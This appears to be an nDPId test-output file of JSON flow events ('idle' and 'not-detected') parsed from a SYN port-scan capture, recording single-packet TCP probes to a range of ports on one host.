-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1024,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1025,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1025,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1471,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060695,"flow_last_seen":1278275060695,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1026,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1471,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060695,"flow_last_seen":1278275060695,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1026,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1025,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1025,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1530,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060796,"flow_last_seen":1278275060796,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1026,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1530,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060796,"flow_last_seen":1278275060796,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1026,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":428,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1027,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":428,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1027,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":548,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9220,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":548,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9220,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1590,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1028,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1590,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1028,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":479,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059156,"flow_last_seen":1278275059156,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1027,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":479,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059156,"flow_last_seen":1278275059156,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1027,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":599,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9220,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":599,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9220,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1660,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1028,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1660,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1028,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":864,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1029,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":864,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1029,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3077,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3077,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1186,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060291,"flow_last_seen":1278275060291,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1030,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1186,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060291,"flow_last_seen":1278275060291,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1030,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":941,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1029,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":941,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1029,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3077,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3077,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1270,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1030,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1270,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1030,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":636,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059516,"flow_last_seen":1278275059516,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1031,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":636,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059516,"flow_last_seen":1278275059516,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1031,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1198,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1032,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1198,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1032,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":701,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1031,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":701,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1031,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1493,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1033,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1493,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1033,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1274,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060395,"flow_last_seen":1278275060395,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1032,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1274,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060395,"flow_last_seen":1278275060395,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1032,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1556,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1033,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1556,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1033,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1546,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1034,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1546,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1034,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 